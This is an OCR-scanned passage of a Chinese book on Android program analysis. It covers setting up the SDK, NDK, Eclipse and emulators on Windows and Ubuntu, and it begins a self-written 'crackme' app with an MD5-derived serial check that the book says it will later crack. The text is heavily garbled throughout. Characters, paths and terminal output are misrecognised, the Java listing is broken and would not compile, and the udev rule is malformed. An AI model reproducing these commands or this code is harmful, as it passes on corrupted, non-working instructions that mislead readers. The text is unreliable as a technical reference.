装 环 境 为 Dandroid-sdk 目 录 ， 然 后 将 *D:vandroid- 
sdk\tools” 与 “D:\android-sdk\platform-tools” 目 录 添 加 到 系统 的 PATH 环 境 
变量 中 。 添 加 完成 后 打开 一 个 CMD 窗 口 ， 输 入 “emulator-version” 与 “adb 
version” 命 令 碍 看 是 否 能 成 功 运 行 。 执 行 结果 如 图 1-5 所 示 。 


c\ C:\VINDOYS\systenm32\cnd. exe 


Microsoft Windows 8%P [版 本 5.1.2680] 
CC》 版权 所 有 1985-2881 Microsoft Corp. 


:\Documents and Settings dministrator>2emulator —version 


C:\Documents and Settings Mdministrator>fndroid emulator version 28.8 huild_iad 
OPENMASTER-391819> 

opyright (CGC> 2006-2811 The fndroid OQpen Source Project and many others. 

This program is a derivative of the QEMYU CPU emulator Cwww.qemu.org>. 


This software is licensed under the terms of the GNU General Public 
License version 2,. as published by the Free Software Foundation, and 
may he copied, distrihuted, and modified under those terms. 


This program is distributed in the hope that it will be useful. 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR Af PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


C:\Documents and Settings Mdministrator>2adbh version 
ndroid Debug Bridge 9 


Documents and Settings dministrator>, 





图 1-5 检查 Android SDK 是 否 正确 安装 


Android ”SDK 安装 成 功 后 ， 需 要 通过 SDK 管 理 器 下 载 具 体 版 本 的 








SDK， 双 击 “D:\android-sdkK\SDK Manager.exe” 文 件 ， 打 开 Android SDK 
Manager， 运 行 后 如 图 1-6 所 示 。 


.Tg 丰 anager 
Packages Tools 
SDK Path: 
Packages 
下 Jame Status 
已 ` 癌 Tools 
器 其 Android SDK Tools 本 Installed 
口 碾 Mndroid SDK Flatform-tools Installed 
由 器 国 Mmdroid 4.1 (PI 16) 
由 回避 Android 4.0.3 (API 15) 
二 口 = Android 4.0 (AFT 14) 
由 :回国 Android 3.2 (PI 13) 
由 :器 加 mdroid 3.1 WPI 12) 
由 :器 Android3.0 (PI 11) 
由 口 Mndroid 2.3.3 (FI 10) 
由 -回国 如 troid 2.2 (API 8) 
由 器 团 Android 2.1 (PI 7) 
由 -器 局 Android 1.6 FI 4) 
由 - 癌 辣 Mmdroid 1.5 (PI 3) 
由 "回电 | Extras 


Show: Updates/New [vInstslled [Obsolete Select Hew or Updates Install 9 packages,,, 
Sort by: © aFI level ORepository Deselect All Delete 1 package... 


[ 一 


Done loading packages. 

















图 1-6 Android SDK Manager 运 行 界面 


读者 可 以 根据 自己 的 需要 选择 相应 的 一 个 或 多 个 版 本 进行 下 载 ， 本 
书 选择 了 2.2、2.3.3、4.0、4.0.3、4.1 等 几 个 版 本 ， 点 击 Install package 按 
钮 打开 “Choose Package to Install* 对 话 框 ， 选 择 “Accept All* 单 选 框 ， 最 
后 点 击 “Install” 按 钮 开始 下 载 ， 下 载 所 需 的 时 间 根 据 网 络 环境 差异 可 能 
会 有 所 不 同 。 


1.1.3 ”安装 Android NDK 


Android NDK 是 Google 提 供 的 开发 Android 原 生 程序 的 工具 包 。 如 今 
越 来 越 多 的 软件 与 病毒 采用 了 基于 Android NDK 动 态 库 的 调用 技术 ， 隐 
藏 了 程序 在 实现 上 的 很 多 细节 ， 竺 握 Android NDK 程 序 的 分 析 技 术 也 成 
为 了 分 析 人 员 必 备 的 技能 ， 本 书 将 会 在 第 7 章 对 Android ”NDK 程 序 的 特 
点 以 及 分 析 技 术 进 行 详细 的 讲解 。 

Android NDK 的 下 载 地 址 为 : 
http://developer.android.com/sdk/ndk/index.html， 目 前 最 新 版 本 为 R8， 
Windows 平 台 下 的 完整 下 载 链接 为 ; 
http://dl.google.com/android/ndk/android-ndkr8-windows.zip。 将 下 载 后 的 
压缩 包 解 压 到 硬盘 任意 位 置 ， 本 书 为 D 盘 根 目 录 。 新 建 环境 变量 
ANDROID_NDK， 值 为 Dandroid-ndk-r8， 然 后 将 ANDROID_NDK 添 加 
到 PATH 环境 变量 中 ， 做 好 这 一 步 ，Android NDK 就 算 安装 完成 了 。 

接 下 来 测试 配置 是 否 正 确 ， 打 开 一 个 CMD 窗 口 ， 进 入 目 
录 “D:\android-ndk-r8\samples\hello-jni”*”， 输 入 “ndk-build” 命 令 编译 
Android NDK 中 目 带 的 hello-jni 工 程 ， 如 果 输 出 如 图 1-7 所 示 的 结果 ， 束 
说 明 Android NDK 安 装 成 功 了 。 























oc C:\¥INDOYS\systen32\cnd. exe 


icrosoft Windows XP [版 本 5.1.2688] 
《C》 有 版 术 所 有 1985-28@1 Microsoft Corp. 


c:\Documents and Settings dministrator»d: 
D:N>cd d:\android-ndk-r8\samples‘\he1lo—jni 


D:\android-ndk-—r8\samples\hello—jni>ndk-build 
dbserver : [akm-1linux-androideahbi-4.4.3] 1ipbsarmeahbiAgdhbseuekr 
iedhbsetup : 1ihbs“akrmeahbigdhb .setup 
"Compile thunhb : hello-jni <= hello—jni.c 
haredLihbraru  : lihbhello-jni.so 
Install : libhhello-jni.so => libhbs/armeabi/libhbhello-jni.so 


D:\android-ndk-r8\samples hel1llo—-jni> 











图 1-7 使 用 Android NDK 编 译 hello-jni 工 程 

















1.1.4 Eclipse 集成 开发 环境 


Eclipse 是 Android 开 发 推荐 使 用 的 IDE。 它 的 下 载 地 址 为 : 
http://www.eclipse.org/downloads， 选 择 下 载 “Edlipse IDE for Java 
Developers” 或 “Eclipse for Mobile Developers” 版 本 即 可 。 强 烈 建议 下 载 使 
用 后 者 ， 后 者 自 带 了 CDT (C/C++Development Tools) 插件 ， 并 针对 手 
机 开发 做 了 优化 。 

Eclipse 是 一 球 绿 色 软 件 ， 下 载 完 成 后 解压 到 硬盘 任意 目录 ， 本 书 为 
D 盘 根 目 录 。 进 入 “D:eclipse” 目 录 ， 运 行 eclipse.exe，Eclipse 会 根据 前 面 
设置 的 环境 变量 自动 进行 初始 化 ， 如 果 启 动 时 没有 提示 错误 说 明 安 装 成 
功 。 











1.1.5 ”安装 CDT、ADT 搬 件 


如 果 读 者 使 用 的 Eclipse 是 For Mobile Developers 版 本 或 自 带 CDT 插 
件 ， 可 以 跳 过 CDT 插 件 的 安装 ;否则 需要 手动 安装 CDT 插 件 。 安 装 
Eclipse 的 插件 比较 简单， 有 在 线 安装 与 离线 安装 两 种 方式 ， 步 又 分 别 
为 : 

e@e 启动 Eclipse， 点 击 菜 单 “Help -Install New Software” 打 开 Install 
对 话 框 ， 在 “Work With” 和 劳 边 的 编辑 框 中 输入 
http://download.eclipse.org/tools/cdt/releases/juno 并 回 车 ， 稍 等 片刻 后 下 面 
列表 框 就 会 解析 出 CDT 插 件 。 

e 到 Eclipse 官网 上 手动 下 载 最 新 版 的 CDT 插 件 ， 目 前 最 新 8.1.0。 
下 载 地 址 为 :http:/www.eclipse.org/cdt/downloads.php。 启 动 Edipse， 点 
击 荣 单 *Help Install New Software” 打 开 Install 对 话 框 ， 点 击 界面 上 的 











Add 按 钮 ， 打 开 Add ”Repository 对 话 框 ， 接 着 点 击 Archive 按 钮 ， 选 择 下 
载 的 CDT 压 缩 包 ， 点 击 OK 按钮 返回 。 

无 论 采 用 上 面 哪 一 种 方式 进行 安装 ， 最 终 都 会 在 Name 下 面 的 列表 
中 列 出 可 供 安装 的 CDT 插 件 ， 如 图 1-8 所 示 ， 全 部 勾 选 后 点 击 Next 按 钮 
即 可 安装 ， 在 线 安 装 耗 费 的 时 间 根 据 网 络 环境 差异 可 能 有 上 所 不 同 。 


Instal1 


Available Software 
Check the items that you wish to install. 


Work with: Ihttp://download. eclipse. org/tools/cdt/releases/ juno 


Find more software by working with the “Available Software Sites” preferences. 


Name Version 
1 |MU CDT Wain Features 
4 MU CDT Optional Features 


Selaect All Deselect All 


Details 
CDT Main Features 1.0.0.7V3-cLSwvwETETAETUAAAINNOQ 


加 Show only the latest versions of available software Oiide items that are already installed 
网 Group items by category What is already instslled? 
加 Show only software applicable to target environmment 


[contact all update sites during install to find required software 








图 1-8 安装 CDT 插 件 


ADT 插 件 是 Google 为 Android 开 发 提供 的 Eclipse 插件 ， 方 便 在 
Eclipse 开发 环境 中 创建 、 编 辑 、 调 试 Android 程 序 。 安 装 过 程 与 CDT 揪 
件 类 似 。 目 前 最 新 版 本 为 20.0.0， 官 方 下 载 地 址 为 : 
http:/dl.google.comy/android/ADT-20.0.0.zip， 在 线 安装 的 repository 地 址 
为 : https://dlssl.google.com/android/eclipse/， 读 者 可 以 按照 上 面 的 步 双 





自行 完成 安装 。 

ADT 插 件 安 装 完 成 后 需要 进行 相应 的 配置 。 点 击 Eclipse 沫 单 
项 “Window-Preferences”"， 选 择 Android 列 表 项 ， 在 右 侧 SDK Location 处 
选择 Android SDK 的 安装 位 置 ， 如 Di\android-sdk， 展 开 Android 列 表 项 ， 
选择 NDK， 在 右 侧 NDK Location 处 选择 Android NDK 的 安装 位 置 ， 如 
D:android-ndk-r8。 设 置 完 后 点 击 OK 按 钮 关闭 对 话 框 。 到 此 ，CDT 与 
ADT 插 件 就 安装 完成 了 。 





1.1.6 ”创建 Android Virtual Device 


Android SDK 中 提供 了 “Android Virtual Device Manager” 工 具 ， 方 便 
在 没有 真实 Android 设 备 环境 的 情况 下 调试 运行 Android 程 序 。 

双击 运行 “D:\android-sdk-windows\AVD Manager.exe”， 点 
击 “New” 按 钮 ， 打 开 AVD 创 建 对 话 框 ， 在 “Name” 栏 输入 AVD 的 名 称 ， 
如 输入 “Android2.3.3”， 在 Target 一 栏 选 择 要 模拟 的 Android 版 本 ， 这 里 选 
择 “Android 2.3.3 - API Level 10?，SD Card 大 小 指定 为 256MB， 其 它 选 
项 保持 不 变 ， 结 果 如 图 1-9 所 示 。 





Create new Android Yirtual Device (AYD) 





Jame: hndrold2. 39.9 
Veet |Goocle APIs (Google Ine.) - APT Leval 10 





CPU/ ABI: 
sD Card: 


Snapshot: 








@@Size: |256 
OFile: | 


[ |Ensabled 


© Built-in: vr a po aa 


OO Resolution: | | x 











Property Value 


Abstracted LLD density 240 
Max VM application h... 24 
Device ram size 256 


图 1-9 创建 AVD 


点 击 “Create AVD” 按 钮 完成 AVD 的 创建 。 选 中 创建 的 AVD， 点 击 
右 侧 的 “Start” 按 钮 ， 如 果 没 有 错误 会 成 功 启 动 这 个 Android 虚 拟 设 备 。 








如 果 使 用 真实 Android 设 备 来 调试 程序 ， 需 要 先 在 设备 的 “设置 , 程 
序 = 开 发 ”选项 中 开启 “USB 调 试 "， 然 后 安装 相应 设备 厂商 提供 的 USB 
驱动 程序 。 一 份 常 见 的 USB 驱 动 程序 下 载 地 址 列表 可 以 在 
http://developer.android.com/tools/extras/oem-usb.html 中 找到 。 安 装 完 驱 
动 后 在 命令 提示 符 下 输入 “adb ”devices” 就 可 以 列 出 连接 的 Android 设 备 
削 训 


1.1.7 使 用 到 的 工具 


分 析 Android 程 序 需要 用 到 很 多 工具 ， 包 括 : 反 编 译 工 具 、 静 态 分 
析 工 具 、 动 态 调试 工具 、 集 成 分 析 环 境 等 。 所 有 的 工具 中 ， 大 多 数 是 开 
源 或 免费 的 软件 ， 笔 者 在 此 不 详细 列 出 使 用 到 的 工具 ， 在 每 一 章 对 知识 
点 进行 介绍 时 ， 会 同时 介绍 相关 工具 的 使 用 方法 与 下 载 地 址 。 











1.2 Linux 分 析 环 境 搭建 


本 书 中 介绍 的 Windows 环 境 下 的 大 多 数 操 作 ， 在 Linux 环 境 下 同样 
适用 。 本 节 将 介绍 如 何在 Linux 环 境 下 搭建 Android 程 序 的 分 析 环 境 。 


1.2.1 本 书 的 Linux 环 境 


本 书 在 写作 时 使 用 的 Linux 环 境 为 Ubuntu 10.04 32 位 系统 ， 在 最 后 一 
章 进 行 Android 病 毒 分 析 时 使 用 的 是 Ubuntu 12.04 32 位 系统 。 


1.2.2 ”安装 JDK 





首先 在 当前 用 户主 目录 下 新 建 tools 目 录 来 存放 Android 分 析 常 用 的 
站 本 

到 Oracle 官 方 网 站 下 载 JDK 安 装 包 。 本 书 Ubuntu 平台 使 用 的 版 本 为 
jdk-6u33-linux-i586， 下 载 地 址 为 
http://www.oracle.com/technetwork/java/javase/downloads/index.html， 将 
下 载 的 jdk-6u33-linux-i586.bin 文 件 放 到 /home/feicong/tools 目 录 (feicong 
为 本 机 用 户 名 ) ， 打 开 一 个 终端 环境 输入 以 下 命令 : 

cd tools 

chmod +x ./jdk-6u33-linux-i586.bin 

./jdk-6u33-linux-i586.bin 

此 时 安装 程序 会 自动 将 JDK 安 装 到 当前 目录 的 jdk1.6.0 .33 目录 下 。 
接着 设置 环境 变量 ， 执 行 : 

sudo gedit /etc/profile 


在 配置 文件 中 加 入 如 下 部 分 : 


export JAVA_HOME=/home/feicong/JjJdk1.6.0_ 33 

export JRE HOME=/home/feicong/jdkl1.6.0_33/jre 

export PATH=/home/feicong/jdkl1.6.0_33/bin:$PATH 

export CLASSPATH=.:/home/feicong/jdkl1.6.0_33/l1ib:/home/feicong/jdk1.6.0_33/ 
jre/lib 


保存 后 退出 ， 在 终端 提示 符 中 输入 如 下 命令 使 环境 变量 生效 : 


source sd 
最 后 输入 命令 “java ”version” 验 证 JDK 是 否 安 装 成 功 ， 如 图 1-10 所 
外。 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 
opening the register.html file (Located in the JDK installation 
directory) in a browser. 


For more information on what data Registration collects and 
how it is managed and used, see: 
http://java.sun.com/javase/registration/]JDKRegistrationpPrivacy .htmt 


Press Enter to continue 


Done . 

feicong@feicong-ubuntu:~/tools$ sudo gedit /etc/profile 
[sudo] password for feicong: 
feicong@feicong-ubuntu:~/tools$ source /etc/profile 
feicong@feicong-ubuntu:~/tools$ java -version 

Java version "1.6.0 33” 

Java(lT™™M) SE Runtime Environment (build 1.6.9 33-b63) 
Java HotSpot(T™M) Server VM (build 26.8-b93，mixed mode) 
feicong@feicong-ubuntu:~/tools$ 四 ‘ 





图 1-10 ”验证 JDK 是 否 安装 成 功 





1.2.3 在 Ubuntu 上 安装 Android SDK 


Ubuntu 上 安装 Android SDK 与 Windows 安 装 步 又 类 似 ， 首 先 到 官 
网 站 http://developer.android.com/sdk/index.html 下 载 Android SDK, 日 。 
最 新 版 本 为 r20， 下 载 后 将 android-sdk_r20-linux.tgz 压 缩 包 文件 放 到 tools 
目录 ， 执 行 以 下 命令 进行 解 包 : 


tar ZzZvxf android-sdk_r20-1inux.tgz 


解 包 完毕 后 就 会 在 当前 日 录 下 出 现 android-sdk-linux 目 录 了。 这 个 日 








录 的 内 容 与 Windows 平 台 提 供 的 工具 类 似 。 接 着 设置 环境 变量 ， 执 行 : 
sudo gedit /etc/profile 


在 配置 文件 中 加 入 如 下 部 分 : 


export PATH=/home/feicong/tools/android-sdk-linux/platform-tools:S$PATH 
export PATH=/home/feicong/tools/android-sdk-linux/tools:s$PATH 


保存 后 退出 ， 在 终端 提示 符 中 输入 “source/etc/profile” 使 环境 变量 生 
效 。 输 入 “emulator -, version” 与 “adb version” 命 令 查看 是 否 能 成 功 运行 。 
如 果 出 现 如 图 1-11 所 示 的 画面 说 明 设 置 成 功 。 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 


android-sdk-linux/tools/etcltool 

android-sdk-linux/tools/mksdcard 

android-sdk-linux/tools/traceview 
android-sdk-linux/tools/emulator-arm 

feicong@feicong-ubuntu:~/tools$ sudo gedit /etc/profile 

[sudo] password for feicong: 

feicong@feicong-ubuntu:~/tools$ source /etc/profile 
feicongGfeicong-ubuntu:~/toots$ emulator -version 

Android emulator version 18.6 (build id MASTER-396762) 

Copyright (C) 2696-26011 The Android Open Source Project and many others. 
This program is a derivative of the QEMU CPU emulator (www.qemu.org) . 


This software is licensed under the terms of the GNU General Public 
License version 2, as published by the Free Software Foundation, and 
may be copied, distributed, and modified under those terms. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


feicongGfeicong-ubuntu:~/toots$ adb version 
Android Debug Bridge version 1.0.29 
feicong@feicong-ubuntu:~/toolss$ 





图 1-11 测试 Android SDK 


配置 好 环境 后 就 需要 下 载 具体 版 本 的 SDK 了 ， 在 终端 提示 符 中 输入 
android 命 令 局 动 Android SDK 接 下 来 的 下 载 步 骤 与 Windows 
平台 是 一 样 的 ， 具 体操 作 这 里 就 不 再 次 述 了 。 





1.2.4 在 Ubuntu 上 安装 Android NDK 


首先 到 Android 官 方 网 站 
http://developer.android.com/sdk/ndk/index.html 下 载 Android  NDK， 目 前 
Linux 平 台 的 最 新 版 本 为 r18， 将 下 载 的 android-ndk-r8-linux-x86.tar.bz2 文 
件 放 到 tools 目 录 ， 在 终端 提示 符 下 输入 以 下 命令 解 包 : 


tar Jxvf ./android-ndk-r8-linux-x86.tar.bz2 

解 包 完毕 后 就 会 在 当前 目录 下 出 现 android-ndk-r8 目 录 了 。 接 着 设置 
环境 变量 ， 执 行 : 

sudo gedit /etc/profile 


在 配置 文件 中 加 入 如 下 部 分 : 


export ANDROID_ NDK=/home/feicong/tools/android-ndk-r8 
export PATH=/home/feicong/tools/android-ndk-r8:s$PATH 


保存 文件 后 退出 ， 在 终端 提示 符 中 输入 “source/etc/profile” 使 环境 变 
量 生 效 。 接 下 来 在 终端 提示 符 下 进入 android-ndk-r8/samples/hello-jni 目 
录 ， 然 后 输入 ndk-build 命 令 编译 hello-jni 工 程 ， 如 果 配 置 正 确 ， 执 行 结 
果 如 图 1-12 所 示 。 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 
android-ndk-r8/build/tools/toolchain-patches/gdb/960604-ndk-Fix-MIPS-builds-on-Dare 
in.patch 
android-ndk-r8/build/tools/toolchain-symbols/ 
android-ndk-r8/build/tools/toolchain-symbols/arm/ 
android-ndk-r8/build/tools/toolchain-symbols/arm/libgcc.a.functions.txt 
android-ndk-r8/build/tools/toolchain-symbols/mips/ 
android-ndk-r8/build/tools/toolchain-symbols/mips/\libgcc.a.functions.txt 
android-ndk-r8/build/tools/toolchain-symbols/x86/ 
android-ndk-r8/build/tools/toolchain-symbols/x86/\ibgcc.a.functions .txt 
android-ndk-r8/RELEASE .TXT 
android-ndk-r8/README .TXT 
android-ndk-r8/GNUmakefile 
feicong@feicong-ubuntu:~/tools$ sudo gedit /etc/profile 
[sudo] password for feicong: 
feicong@feicong-ubuntu:~/tools$ cd android-ndk-r8/ 
feicong@feicong-ubuntu:~/tools/android-ndk-r8$ cd samples/ 
-ubuntu:~/tools/android-ndk-r8/samples$ cd hello-jni/ 
-Ubuntu:~/tools/android-ndk-r8/samples/hello-jni$ ndk-build 
[arm-Linux-androideabi-4.4.3] libs/armeabi/gdbserver 
: libs/armeabi/gdb.setup 
: hello-jni <= hello-jni.c 
SharedLibrary : libhello-jni.so 
Install : LibheLLo-jni.sSo => Libs/armeabi/LibheLtLo-jni.so 
feicong@feicong-ubuntu:~/tools/android-ndk-r8/samples/hello-jnis 

















图 1-12 ”使 用 Android NDK 编 译 工程 




















1.2.5 在 Ubuntu 上 安 疫 Eclipse 集成 开 及 环境 


首先 到 Eclipse 官方 网 站 http:/www.eclipse.org/downloads/ 下 载 Eclipse 
IDE for Java Developers 版 本， 将 下 载 到 的 eclipse-jee-indigo-SR2-linux- 
gtk.tar.gz 文 件 放 到 tools 目 录 ， 输 入 以 下 命令 解 包 : 


tar zxvf ./eclipse-jJee-indigo-SR2-1linux-gtk.tar.gz 
解 包 完 毕 后 就 会 在 当前 目录 下 出 现 eclipse 目 录 。 有 目录 中 的 eclipse 文 
件 就 是 主 程序 ， 为 方便 以 后 使 用 可 以 在 架 面 上 建立 快捷 方式 。 








1.2.6” 在 Ubuntu 上 安装 CDT、ADT 插 件 


Ubuntu 上 安装 CDT、ADT 搬 件 与 Windows 平 台 上 的 安装 步骤 是 一 样 
的 ， 读 者 可 以 参考 1.1.5 小 节 内 容 进 行 安装 ， 这 里 不 再 资 述 。 


1.2.7 创建 Android Virtual Device 


Linux 版 的 Android SDK 没 有 提供 可 视 化 的 AVD Manager 管 理工 具 ， 
创建 AVD 可 以 使 用 android 命 令 。 在 终端 提示 符 下 输入 “android list 
targets” 列 出 本 机 已 经 下 载 好 的 SDK， 本 机 输出 结果 如 下 : 


feicong@feicong-ubuntu:~/tools$ android list targets 
Available Android targets: 


id: 2 or "android-8" 
Name: Android 2.2 
Type: Platform 
API level: 8 
Revision: 3 
Skins: WVGA800 (default), HVGA, QVGA, WVGA854, WQVGA432, WQVGA400 
ABIs : armeabi 
id: 3 or "android-10" 
Name: Android 2.3.3 
Type: Platform 
API level: 10 
Revision: 2 
Skins: WVGA800 (default), HVGA, QVGA, WVGA854, WQVGA432, WQVGA400 
ABIs : armeabi 


id: 6 or "android-15" 

Name: Android 4.0.3 

Type: Platform 

API level: 15 

Revision: 3 

Skins: WSVGA, WVGA800 (default), HVGA, QVGA, WVGA854, WXGA7T20, WXGA800, 
WQVGA432, WOVGA400 


ABIs : armeabi-v7a 


每 一 个 id 对 应 一 个 版 本 的 SDK。 这 个 id 在 创建 AVD 时 会 使 用 到 。 创 
建 AVD 的 命令 格式 为 “android create avd --name <your_avd_name> --target 
<targetID>”， 比 如 想 要 创建 Android 系 统 版 本 为 2.3.3 且 名 称 为 
android2.3.3 的 AVD 只 需 在 终 并 提示 符 下 输入 如 下 命令 : 


android create avd --name android2.3.3 --target android-10 
创建 AVD 完 成 后 可 以 使 用 emulator 来 启动 它 ， 在 终端 提示 符 下 输入 
es -avd android2.3.3 


狼 运 行 效果 如 图 1-13 所 示 。 





O00@0@ feicong@feicong-ubuntu: ~/tools 


文件 (F) 编辑 (E) 查看 (V) 终端 (T) 帮助 (H) 


feicong@feicong-ubuntuy:~/tools$ android create avd --name androi 
android-19 

Auto-selecting single ABI armeabi 

Android 2.3.3 is a basic Android platform. 

Do you wish to create a custom hardware profile [no]no 

Created AVD 'android2.3.3” based on Android 2.3.3，ARM (armeabi) 
with the following hardware config: 

hw. lcd.density=240 


ftools$ emulator -avd android2.3.3 


emulator: emulator window was out of view and was recentered 


PP 
rl pm py 








图 1-13 Android 模 拟 器 运行 界面 


如 采 使 用 真实 Android 设 备 来 调试 程序 ， 还 需要 做 一 些 工 作 。 首 移 
需要 在 设备 的 “设置 -程序 ~ 开发 "选项 中 开局 “USB 调 试 ”， 接 着 将 设备 
连接 电脑 ， 在 终端 提示 符 中 输入 lsusb 命 令 查看 连接 的 USB 设 备 。 我 的 测 
试 机 型 为 Moto XT615， 命 令 执行 后 会 得 到 如 下 输入 。 


feicong@feicong-ubuntu:~$ lsusb 

Bus 003 Device 002: ID 15d9:0a4c Dexon 

Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub 

Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub 

Bus 001 Device 005: ID Obda:0158 Realtek Semiconductor Corp. Mass Storage Device 
Bus 001 Device 004: ID 22b8:2de6 Motorola PCS 

Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub 


其 中 22b8 为 Vendor id 值 ，2de6 为 Product id。 不 同 的 设备 厂商 Vendor 
id 值 不 同 。 可 以 在 


http://developer.android.com/tools/device.html#Vendorlds 找 到 一 份 常 见 设 
备 厂 商 的 Vendor id 列 表 。Product id 则 是 具体 产品 的 id 值 。 同 一 厂商 的 不 
同 设备 Vendor id 相 同 而 Product id 不 同 。 记 录 下 Vendor id 与 Product id 
值 ， 然 后 编辑 udev 规 则 文件 /etc/udev/rules.d/70-android.rules， 没 有 则 创 
建 ， 内 容 如 下 。 


SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="2de6", GROUP="plugdev" 


其 中 的 22b8 与 2de6 根 据 自己 的 Vendor id 与 Product id 值 进行 相应 的 更 
改 ， 修 改 保存 后 退出 ， 在 终端 提示 符 中 输入 命令 “adb devices” 就 能 列 出 
配置 好 的 Android 设 备 了 。 


1.2.8 ”使 用 到 的 工具 











本 书 讲解 Android 程 序 分 析 时 使 用 到 的 工具 大 多 数 是 跨 平 台 的 ， 这 
些 工 具 同 时 拥有 Windows 版 本 与 Linux 版 本 ， 笔 者 在 介绍 它们 时 会 给 出 
相应 工具 的 下 载 地 址 ， 并 且 给 出 其 安装 方法 。 另 外 ， 本 书 中 也 有 个 别 的 
工具 是 与 平台 相关 的 ， 笔 者 在 书 中 都 有 详细 的 说 明 。 





1.3 ”本章 小 结 


本 章 主 要 介绍 了 分 析 Android 程 序 时 常用 到 的 一 些 工 具 ， 熟 练 掌握 
这 些 工 具 的 使 用 是 分 析 Android 程 序 的 基础 ， 接 着 介绍 了 Windows 平 台 与 
Ubuntu 平台 下 Android 开 发 环境 的 搭建 ， 为 后 面 的 分 析 环 境 做 准备 。 在 
学 习 完 本 章 后 ， 读 者 可 以 自行 下 载 本 章 所 提 及 到 的 工具 ， 动 手 练习 如 何 
使 用 它们 ， 这 些 工具 的 具体 使 用 会 在 本 书后 面 章 节 逐 一 进行 介绍 





第 2 章 ”如 何 分 析 Android 程 序 


分 析 Android 程 序 是 开发 Android 程 序 的 一 个 逆 过 程 。 然 而 作为 分 析 
人 员 ， 和 擎 握 分 析 技 术 还 得 从 开发 学 起 ， 这 个 学 习 的 路 线 应 该 是 呈 线 性 
的 、 循 序 渐进 的 。 要 想 分 析 一 个 Android 程 序 ， 首 先 应 该 了 解 Android 程 
序 开发 的 流程 、 程 序 结构 、 语 句 分 支 、 解 密 原理 等 。 本 章 将 以 走马 观 花 
的 形式 ， 从 开发 Android 程 序 开始 ， 到 最 终 分 析 并 破解 这 个 程序 ， 将 这 
一 完整 路 线 展 现 出 来 。 








2.1 编写 第 一 个 Android 程 序 








本 节 将 采用 Android 官 方 推荐 的 Eclipse 集成 开发 环境 来 编写 一 个 
Android 应 用 程序 。 


2.1.1 ”使 用 Edlipse 创 建 Android 工 程 


启动 Edipse， 新 建 一 个 Android 工 程 。“Application Name” 为 
Crackme0201, “Project Name” 为 crackme02, “Package Name” 为 
com.droider.crackme0201， 其 他 保持 默认 ， 设 置 好 后 如 图 2-1 所 示 。 


EE Hew Android App 


New Android Application 
Creates a new Android Application 


Application Hame:i [CrackmeD201 





Project Hame:@ | crackmeD2 


Package Hame:B|com. droider. crackme0201| 








Build SDK:@| Android 2.2 (API 8) 











| API 6: Android 2.2 (Froyo) 


create custom launcher icon 
[Mark this project as a library 
[vlCreate Project in Workspace 


| 


The package name must be a unigue identifier for your application. 

It is typically not shown to users, but it *must* stay the same for the lifetime of your 
application; it is how multiple versions of the same application are considered the “same app'. 
This is typically the reverse domairn name of your organiration plus one or more application 
identifiers, and it mast be a valid Java package name. 











图 2-1 使 用 Eclipse 创建 Android 工 程 


一 路 单 击 Next 按 钮 ， 最 后 点 击 Finish 按 钮 完成 工程 的 创建 。 打 开工 
程 的 activity_main.xzml 布 局 文件 ， 添 加 用 户 名 与 注册 码 编辑 框 ， 修 改 完 
成 后 ， 最 终 界面 效果 如 图 2-2 所 示 。 
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图 2-2 ”crackme 程 序 主 界面 


接着 编写 MainActivity 类 的 代码 ， 添 加 一 个 checkSNO 方 法 ， 代 码 如 


private boolean checkSN(String userName, String sn) { 


try { 
if ((userName == null) || (userName.length() == 0)) 
return false; 
if ((sn == null) || (sn;length() != 16')) 


return false; 
MessageDigest digest = MessageDigest.getIinstance("MD5"); 
Qigest .zeset () ; 


) 
Qigest.updaate(userName .getBytes()); 


byte[] bytes digest.digest ()，; /1 采用 MD5 对 用 户 名 进行 Hash 
string hexstr = toHexString (bytes,，""); // 将 计算 结果 转化 成 字符 串 


StringBuilder sb = new StringBuilder(); 

for (int 4 =°0» 1 x Merxastr, Tength(}): += 2) 1{ 
sb.append (hexstr.charAt (1)); 

} 

String userSN = sb.toString(); // 计 算出 的 SN 

if (!iuserSN.equalsIgnoreCase(sn))  // 比 较 注册 码 是 否 正确 
return false; 

} catch (NoSuchAlgorithmException e) { 
e.printStackTrace(); 
return false; 


} 


return true; 


这 个 方法 的 主要 功能 是 计算 用 户 名 与 注册 码 是 否 匹配 。 计算 的 步骤 
为 : 使 用 MD5 算 法 计算 用 户 名 字符 串 的 Hash， 将 计算 所 得 的 结果 转换 成 
长 度 为 32 位 的 十 六 进 制 字符 串 ， 然 后 取 字 符 串 的 所 有 奇数 位 重新 组 合生 
成 新 的 字符 串 ， 这 个 字符 串 就 是 最 终 的 注册 码 ， 最 后 将 它 与 传 入 的 注册 
码 进行 比较 ， 如 果 相 同 表 示 注 册 码 是 正确 的 ， 反 之 注册 码 是 错误 的 。 

接着 在 MainActivity 的 OnCreate() 方 法 中 加 入 注册 按钮 点 击 事件 的 监 
昕 器 ， 如 果 用 户 名 与 注册 码 逻 配 就 弹出 注册 成 功 的 提示 ， 不 匹配 则 提示 
无 效 的 用 户 名 或 注册 码 ， 代 码 如 下 : 











public void onCreate(Bundle savedInstanceState) 1{ 
super.onCreate(savedInstanceSsState); 
setContentView(R.layout.activity _ main); 


setTitle(R.string.unregister); // 模 拟 程序 未 注册 


edit_ userName = (EditText) findViewById(R.id.edit username); 
edit_sn = (EditText) findViewById(R.id.edit_sn); 
btn register = (Button) findvVviewById(R.id.button register); 


btn_ register.setOnClickListener (new OnClickListener() { 


public void onClick(View v) { 
It (!checkSN(edit userName.getText() .toString() .trim(), 
edit_sn.getText() .tostring() .trim())) { 
Toast.makeText (Mainactivity.this， // 弹 出 无 效用 户 名 或 注册 码 提 示 
R.string.unsuccessed, Toast .LENGTH_SHORT) .show!(); 
} else { 
Toast.makeText (MainActivity.this, /7 弹出 注册 成 功 提示 
R.string.successed, Toast.LENGTH SHORT) .show() ; 
btn register.setEnabled (false); 
setTitle(R.string.registered); // 模 拟 程序 已 注册 


